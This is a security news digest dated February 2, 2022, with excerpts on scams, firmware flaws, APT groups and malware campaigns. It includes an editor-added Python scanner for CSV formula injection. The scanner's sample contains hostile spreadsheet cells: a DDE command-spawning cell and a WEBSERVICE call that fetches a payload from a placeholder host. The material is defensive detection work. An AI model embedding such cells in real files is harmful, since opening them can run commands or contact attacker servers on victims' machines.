February 2, 2022

Fortify Security Team

Title: FBI Warns of Fake Job Postings Used to Steal Money, Personal Info

Date Published: February 1, 2022

https://www.bleepingcomputer.com/news/security/fbi-warns-of-fake-job-postings-used-to-steal-money-personal-info/

Excerpt: “Scammers are trying to steal job seekers’ money and personal information through phishing campaigns using fake advertisements posted on recruitment platforms. The warning was published today as a public service announcement (PSA) on the Bureau’s Internet Crime Complaint Center (IC3). “The FBI warns that malicious actors or ‘scammers’ continue to exploit security weaknesses on job recruitment websites to post fraudulent job postings in order to trick applicants into providing personal information or money,” the FBI says.”

Title: Experts Found 23 Flaws in UEFI Firmware Potentially Impact Millions of Devices

Date Published: February 2, 2022

https://securityaffairs.co/wordpress/127506/breaking-news/uefi-firmware-vulnerabilities.html

Excerpt: “Researchers at firmware security company Binarly have discovered 23 vulnerabilities in UEFI firmware code used by the major device makers. The vulnerabilities could impact millions of enterprise devices, including laptops, servers, routers, and industrial control systems (ICS). All these vulnerabilities affect several vendors, including Fujitsu, Siemens, Dell, HP, HPE, Lenovo, Microsoft, Intel and Bull Atos. The flaws reside in the InsydeH2O UEFI firmware provided by Insyde Software and used by the impacted vendors. The analysis of the disassembly code revealed that the majority of these flaws were exploitable vulnerabilities in the System Management Mode (SMM).”

Title: Russia’s Escalation in Ukraine Sounds Cyber Defense Alarms

Date Published: February 2, 2022

https://www.bankinfosecurity.com/russias-escalation-in-ukraine-sounds-cyber-defense-alarms-a-18425

Excerpt: “Russia’s threat to Ukraine is reshaping notions of what it means to employ cyber operations as part of a conflict. Whether Russian President Vladimir Putin has even decided what he will do next remains unclear, experts say. But a number of military options remain available, and all of them would likely involve some form of cyber escalation, and could well impact such critical infrastructure as the energy and financial services sectors, according to Washington think tank Center for Strategic and International Studies.”

Title: Hacker Group ‘Moses Staff’ Using New StrifeWater RAT in Ransomware Attacks

Date Published: February 1, 2022

https://thehackernews.com/2022/02/hacker-group-moses-staff-using-new.html

Excerpt: “A politically motivated hacker group tied to a series of espionage and sabotage attacks on Israeli entities in 2021 incorporated a previously undocumented remote access trojan (RAT) that masquerades as the Windows Calculator app as part of a conscious effort to stay under the radar. Cybersecurity company Cybereason, which has been tracking the operations of the Iranian actor known as Moses Staff, dubbed the malware “StrifeWater.” “The StrifeWater RAT appears to be used in the initial stage of the attack and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group’s tracks,” Tom Fakterman, Cybereason security analyst, said in a report. “The RAT possesses other capabilities, such as command execution and screen capturing, as well as the ability to download additional extensions.””

Title: Malicious CSV Text Files Used to Install BazarBackdoor Malware

Date Published: February 1, 2022

https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/

Excerpt: “A new phishing campaign is using specially crafted CSV text files to infect users’ devices with the BazarBackdoor malware. A comma-separated values (CSV) file is a text file containing lines of text with columns of data separated by commas. In many cases, the first line of text is the header, or description, for each column.”
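The excerpt explains what a CSV is but not why a plain text file can be dangerous. The added example below is the editor’s own, not code from the article, Bleeping Computer or the BazarBackdoor research, and it rests on an assumption the excerpt does not state: that the “specially crafted” cells are ones a spreadsheet application evaluates as formulas when the CSV is opened directly (the `=`, `+`, `-`, `@` trigger characters, the `WEBSERVICE`/`HYPERLINK` function names and the `cmd|'...'!A0` DDE shape are all the editor’s assumptions about spreadsheet behaviour). It scans a constructed sample for such cells, grades them, and shows the usual neutralisation: prefixing a single quote so the cell is forced to literal text. Negative numbers are the edge case that a naive “starts with `-`” rule would mis-flag, so they are explicitly excluded.

```python
"""Scan a CSV for cells a spreadsheet would execute instead of display.

Added example, not code from the article or from any vendor. The trigger
characters and function names are the editor's assumptions about how
Excel/LibreOffice interpret cells when a CSV is opened directly.
"""
import csv
import io
import re

# A cell beginning with one of these is parsed as a formula, not as text.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

# Plain numbers also start with + or - but are harmless.
NUMERIC = re.compile(r"[+-]?\d[\d,.]*")

# Formula syntax that reaches outside the file: DDE ( cmd|' ... '!A0 ),
# network fetches, and clickable links.
REACHES_OUT = re.compile(
    r"(?:WEBSERVICE|HYPERLINK|IMPORTXML|IMPORTDATA|DDE)\s*\(|\|\s*'|![A-Z]+\d+",
    re.IGNORECASE,
)


def classify_cell(cell):
    """None for a harmless cell, 'medium' for a bare formula,
    'high' for a formula that can spawn a process or fetch a URL."""
    value = cell.lstrip()  # leading spaces do not stop evaluation
    if not value or NUMERIC.fullmatch(value):
        return None
    if not value.startswith(FORMULA_PREFIXES):
        return None
    return "high" if REACHES_OUT.search(value) else "medium"


def scan_csv(text):
    """Return (row, column, severity, cell) for every suspicious cell."""
    findings = []
    for row_no, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for col_no, cell in enumerate(row, start=1):
            severity = classify_cell(cell)
            if severity:
                findings.append((row_no, col_no, severity, cell))
    return findings


def neutralize_csv(text):
    """Rewrite the CSV so suspicious cells become literal text: a leading
    single quote is the spreadsheet convention for 'treat this as a string'."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    for row in csv.reader(io.StringIO(text)):
        writer.writerow(["'" + c if classify_cell(c) else c for c in row])
    return out.getvalue()


# Constructed sample (not from the campaign): one benign negative number,
# two cells that reach outside the file, one bare formula. The host name
# is a placeholder, not a real domain.
SAMPLE = (
    "Name,Amount,Note\n"
    "Alice,-12.50,regular refund\n"
    "Bob,300,\"=cmd|' /C calc'!A0\"\n"
    "Carol,42,\"=WEBSERVICE(\"\"http://example.invalid/payload\"\")\"\n"
    "Dave,7,@SUM(1+1)\n"
)

if __name__ == "__main__":
    for row_no, col_no, severity, cell in scan_csv(SAMPLE):
        print(f"row {row_no} col {col_no} [{severity}] {cell!r}")
    print(neutralize_csv(SAMPLE))
```

Run against a mail-gateway or download-directory sample, `scan_csv` is the detection side and `neutralize_csv` the mitigation side; the two `high` findings in the sample are the ones that matter, since a `medium` cell only computes inside the workbook while a `high` one can start a process or contact a server.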

Title: Experts Warn of a Spike in APT35 Activity and a Possible Link to Memento Ransomware op

Date Published: February 2, 2022

https://securityaffairs.co/wordpress/127526/apt/apt35-spike-memento-op.html

Excerpt: “The Cybereason Nocturnus Team observed a spike in the activity of the Iran-linked APT group APT35 (aka ‘Charming Kitten’, ‘Phosphorus’, Newscaster, and Ajax Security Team). The Phosphorus group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media. Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011. The APT group previously targeted medical research organizations in the US and Israel in late 2020, and targeted academics from the US, France, and the Middle East region in 2019. They have also previously targeted human rights activists, the media sector, and interfered with the US presidential elections.”

Title: New Malware Used by SolarWinds Attackers Went Undetected for Years

Date Published: February 2, 2022

https://thehackernews.com/2022/02/new-malware-used-by-solarwinds.html

Excerpt: “The threat actor behind the supply chain compromise of SolarWinds has continued to expand its malware arsenal with new tools and techniques that were deployed in attacks as early as 2019, once again indicative of the elusive nature of the campaigns and the adversary’s ability to maintain persistent access for years. According to cybersecurity firm CrowdStrike, which detailed the novel tactics adopted by the Nobelium hacking group last week, two sophisticated malware families were placed on victim systems — a Linux variant of GoldMax and a new implant dubbed TrailBlazer — long before the scale of the attacks came to light. Nobelium, the Microsoft-assigned moniker for the SolarWinds intrusion in December 2020, is also tracked by the wider cybersecurity community under the names UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Iron Ritual (Secureworks).”

Title: ESET Releases Fixes for Local Privilege Escalation Bug in Windows Applications

Date Published: February 2, 2022

https://securityaffairs.co/wordpress/127536/security/eset-windows-applications-bug.html

Excerpt: “Antivirus firm ESET released security patches to address a high severity local privilege escalation vulnerability, tracked as CVE-2021-37852, impacting its Windows clients. An attacker can exploit the vulnerability to misuse the AMSI scanning feature to elevate privileges in specific scenarios. “According to the report, submitted by the Zero Day Initiative (ZDI), an attacker who is able to get SeImpersonatePrivilege can misuse the AMSI scanning feature to elevate to NT AUTHORITY\SYSTEM in some cases.” reads the security advisory published by the company. “The SeImpersonatePrivilege is by default available to the local Administrators group and the device’s Local Service accounts, which are already highly privileged and thus limit the impact of this vulnerability.” The CVE-2021-37852 vulnerability was discovered by the security researcher Michael DePlante (@izobashi), who reported the bug to the company through the Zero Day Initiative (ZDI).”

Title: SEO Poisoning Pushes Malware-laced Zoom, TeamViewer, Visual Studio installers

Date Published: February 2, 2022

https://www.bleepingcomputer.com/news/security/seo-poisoning-pushes-malware-laced-zoom-teamviewer-visual-studio-installers/

Excerpt: “A new SEO poisoning campaign is underway, dropping the Batloader and Atera Agent malware onto the systems of targeted professionals searching for productivity tool downloads, such as Zoom, TeamViewer, and Visual Studio. These campaigns rely on the compromise of legitimate websites to plant malicious files or URLs that redirect users to sites that host malware disguised as popular apps. Upon downloading and executing the software installers, the victims unknowingly infect themselves with malware and remote access software.”

Title: Thousands of Malicious npm Packages Threaten Web Apps

Date Published: February 2, 2022

https://threatpost.com/malicious-npm-packages-web-apps/178137/

Excerpt: “More than 1,300 malicious packages have been identified in the most oft-downloaded JavaScript package repository used by developers, npm, in the last six months — a rapid increase that showcases how npm has become a launchpad for a range of nefarious activities. New research from open-source security and management firm WhiteSource has discovered the disturbing increase in the delivery of malicious npm packages, which are used as building blocks for web applications. Any app using a malicious code block could be serving up data theft, cryptojacking, botnet delivery and more to its users.”
